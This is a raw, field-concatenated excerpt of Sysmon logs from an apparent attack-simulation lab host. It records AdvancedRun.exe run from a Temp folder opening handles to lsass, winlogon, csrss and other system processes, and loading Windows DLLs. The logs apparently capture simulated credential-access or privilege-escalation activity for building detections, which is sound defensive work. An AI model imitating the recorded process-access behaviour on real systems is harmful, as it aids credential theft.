dministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.892{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004078583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.892{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004078581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.892{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.881{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004078579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.870{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.864{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.858{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.858{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.857{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004078574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
